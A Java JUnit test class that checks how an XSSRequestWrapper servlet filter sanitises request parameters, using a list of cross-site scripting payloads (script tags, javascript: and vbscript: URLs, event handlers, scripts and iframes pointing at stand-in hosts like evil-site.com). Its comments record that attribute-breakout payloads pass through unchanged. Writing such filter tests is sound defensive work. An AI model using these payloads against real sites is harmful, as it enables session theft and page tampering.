package pl.garciapl.xss;

import static org.junit.Assert.assertEquals;

import java.io.IOException;

import javax.servlet.ServletException;
import javax.servlet.http.Cookie;

import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.springframework.mock.web.MockHttpServletRequest;
import org.springframework.test.context.ContextConfiguration;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
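/**
 * Characterisation tests for {@link XSSRequestWrapper#getParameter(String)}.
 *
 * <p>Each test stores one attacker-controlled string as a request parameter value,
 * reads it back through the wrapper and pins the exact result. The expectations
 * document what the wrapper does today: whole script/markup elements are removed,
 * bare {@code &}, {@code <} and {@code >} are entity-encoded, and (see
 * {@link #testXSSFilterAlertFourth()}) attribute-breakout payloads pass through
 * unchanged. The wrapper is an input-side filter; these tests do not show it
 * making a value safe for any particular output context.
 *
 * <p>The Spring runner and context are kept from the original fixture although
 * nothing here is injected; presumably {@code XSSRequestWrapper} resolves
 * collaborators through the thread-bound request set in {@link #setUp()} —
 * TODO confirm.
 */
@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration(locations = {"classpath:applicationContext-test.xml"})
public class XSSRequestWrapperTest {

    /**
     * Name under which each payload is stored. A fixed, benign name keeps every
     * test focused on sanitisation of the parameter <em>value</em>; sanitisation
     * of parameter names is not covered by this class.
     */
    private static final String PARAM = "q";

    private MockHttpServletRequest request;

    /**
     * Builds a fresh mock request and binds it to the current thread.
     * The cookie is part of the original fixture; the thread binding is kept
     * because the wrapper may read the request via {@code RequestContextHolder}
     * (nothing in this class reads it) — TODO confirm.
     *
     * @throws ServletException declared for parity with the original fixture;
     *                          nothing here throws it
     */
    @Before
    public void setUp() throws ServletException {
        request = new MockHttpServletRequest();
        request.setCookies(new Cookie("myJSESSIONID", "1"));
        RequestContextHolder.setRequestAttributes(new ServletRequestAttributes(request));
    }

    /**
     * Clears the thread-bound request attributes so state set in {@link #setUp()}
     * cannot leak into other test classes executed on the same thread.
     */
    @After
    public void tearDown() {
        RequestContextHolder.resetRequestAttributes();
    }

    /**
     * Stores {@code dirty} as the value of {@link #PARAM} and returns the value
     * as seen through a freshly constructed wrapper.
     *
     * @param dirty raw, attacker-controlled parameter value
     * @return whatever {@code XSSRequestWrapper.getParameter} returns for it
     * @throws IOException      declared because the original tests declare it;
     *                          whether the wrapper constructor throws is not visible here
     * @throws ServletException same as above
     */
    private String filtered(String dirty) throws IOException, ServletException {
        request.setParameter(PARAM, dirty);
        return new XSSRequestWrapper(request).getParameter(PARAM);
    }

    /** A script element inside a query string is removed; the text before it is kept. */
    @Test
    public void testXSSFilterAlert() throws IOException, ServletException {
        String dirty = "Site.com/search.php?search=<script>alert(\"XSS\");</script>";
        assertEquals("Site.com/search.php?search=", filtered(dirty));
    }

    /**
     * The script element is removed and the remaining {@code &} is entity-encoded.
     * This pins HTML encoding of the stored value itself: a consumer that encodes
     * again when rendering would double-encode, and one that wants the raw query
     * string will not get it.
     */
    @Test
    public void testXSSFilterAlertSecond() throws IOException, ServletException {
        String dirty = "http://example.com/index.php?user=<script>alert(123)</script>&p=123";
        assertEquals("http://example.com/index.php?user=&amp;p=123", filtered(dirty));
    }

    /**
     * A multi-statement script body is removed whole. The trailing space after the
     * closing tag does not survive either — presumably the result is trimmed;
     * confirm against the wrapper.
     */
    @Test
    public void testXSSFilterAlertThird() throws IOException, ServletException {
        String dirty = "http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(\\\"a\\\"); AllLinks[0].href = \\\"http://badexample.com/malicious.exe\\\"; }</script> ";
        assertEquals("http://example.com/index.php?user=", filtered(dirty));
    }

    /**
     * Pins current behaviour for an attribute-breakout payload: the value comes
     * back verbatim, double quote included. The wrapper therefore does not make a
     * value safe for an HTML attribute context; escaping for that context must
     * still happen at the rendering sink.
     */
    @Test
    public void testXSSFilterAlertFourth() throws IOException, ServletException {
        String dirty = "\" onfocus=\"alert(document.cookie)";
        assertEquals("\" onfocus=\"alert(document.cookie)", filtered(dirty));
    }

    /** An element carrying an event-handler attribute is stripped; its text content is kept. */
    @Test
    public void testXSSFilterAlertFifth() throws IOException, ServletException {
        String dirty = "<b onmouseover=alert('Wufff!')>click me!</b>";
        assertEquals("click me!", filtered(dirty));
    }

    /** An unterminated iframe start tag is removed entirely. */
    @Test
    public void testXSSFilterIFrame() throws IOException, ServletException {
        String dirty = "<iframe src=http://evil-site.com/evil.html ";
        assertEquals("", filtered(dirty));
    }

    /** A body element with a javascript: background is removed entirely. */
    @Test
    public void testXSSFilterAlertBody() throws IOException, ServletException {
        String dirty = "<BODY BACKGROUND=\"javascript:alert('XSS')\"> ";
        assertEquals("", filtered(dirty));
    }

    /** A link element with a javascript: href is removed entirely. */
    @Test
    public void testXSSFilterAlertLink() throws IOException, ServletException {
        String dirty = "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">";
        assertEquals("", filtered(dirty));
    }

    /** A meta refresh pointing at a javascript: URL is removed entirely. */
    @Test
    public void testXSSFilterAlertMeta() throws IOException, ServletException {
        String dirty = "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">";
        assertEquals("", filtered(dirty));
    }

    /** An img element with a vbscript: source is removed entirely. */
    @Test
    public void testXSSFilterAlertVBScript() throws IOException, ServletException {
        String dirty = "<IMG SRC='vbscript:msgbox(\"XSS\")'>";
        assertEquals("", filtered(dirty));
    }

    /** An img element with a javascript: source is removed entirely. */
    @Test
    public void testXSSFilterAlertImage() throws IOException, ServletException {
        String dirty = "<img src=\"javascript:alert('XSS');\">";
        assertEquals("", filtered(dirty));
    }

    /** A lower-case script element is removed entirely. */
    @Test
    public void testXSSFilterAlertScript() throws IOException, ServletException {
        String dirty = "<script>alert('attack');</script>";
        assertEquals("", filtered(dirty));
    }

    /** An upper-case script element is removed entirely, i.e. tag matching is case-insensitive. */
    @Test
    public void testXSSFilterAlertScriptSecond() throws IOException, ServletException {
        String dirty = "<SCRIPT>x=/XSS/  alert(x.source)</SCRIPT>";
        assertEquals("", filtered(dirty));
    }

    /** A script element loading an external file is removed entirely. */
    @Test
    public void testXSSFilterAlertScriptThird() throws IOException, ServletException {
        String dirty = "<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>";
        assertEquals("", filtered(dirty));
    }

    /**
     * Bare {@code &}, {@code <} and {@code >} are entity-encoded; commas, slash
     * and period are untouched. The two empty slots in the payload suggest
     * characters were lost when this file was pasted — confirm against the
     * original source before relying on what this test covers.
     */
    @Test
    public void testXSSFilterEscaping() throws IOException, ServletException {
        String dirty = "&, <, >, , , /.";
        assertEquals("&amp;, &lt;, &gt;, , , /.", filtered(dirty));
    }
}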